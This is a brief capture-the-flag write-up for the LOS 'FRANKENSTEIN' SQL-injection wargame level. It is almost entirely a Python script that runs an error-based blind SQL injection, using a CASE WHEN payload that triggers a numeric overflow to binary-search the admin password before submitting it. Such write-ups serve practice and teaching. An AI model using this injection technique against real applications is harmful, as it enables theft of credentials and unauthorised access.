LOS :: 28번 FRANKENSTEIN

WRITE UP

import requests
import re
 
url = "http://los.rubiya.kr/frankenstein_b5bab23e64777e1756174ad33f14b5db.php"
session = {'PHPSESSID':'MY_SESSION'}
data = {}
 
flag=""
 
a=0
b=0xffffffffffffffffffff
while b-a!=0:
    center = hex(a+(b-a)//2+1)
    if(len(center)%2!=0):
        center = "0x0"+center[2:]
    data['pw']="' or id='admin' and case when pw<"+center+" then 1 else 9e307*2 end#"
    res = requests.get(url, params=data, cookies=session)
    if "config" in res.text:
        b=int(center,0)-1
    else:
        a=int(center,0)
 
flag = bytes.fromhex(hex(a)[2:]).decode('utf-8')
flag = re.match('\S*',flag).group().lower()
print("[∞] flag : "+flag)
 
 
 
data['pw']=flag
res = requests.get(url, params=data, cookies = session)
 
if "Clear!" in res.text:
   print("[♪] FRANKENSTEIN Clear!")